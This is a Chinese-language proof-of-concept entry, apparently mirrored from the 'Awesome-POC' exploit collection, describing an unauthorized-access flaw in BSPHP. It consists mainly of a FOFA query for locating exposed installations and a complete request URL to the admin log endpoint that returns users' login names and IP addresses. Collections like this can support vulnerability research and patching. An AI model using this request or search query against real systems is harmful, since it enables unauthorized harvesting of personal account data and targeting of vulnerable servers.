admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/BSPHP index.php 未授权访问 信息泄露漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

27 lines
472 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# BSPHP index.php 未授权访问 信息泄露漏洞
## 漏洞描述
BSPHP 存在未授权访问 泄露用户 IP 和 账户名信息
## 漏洞影响
```
BSPHP
```
## FOFA
```
"BSPHP"
```
## 漏洞复现
访问如下URL泄露用户名与登录IP
```plain
http://xxx.xxx.xxx.xxx/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0
```
![](./images/202202162317323.png)
Reference in New Issue View Git Blame Copy Permalink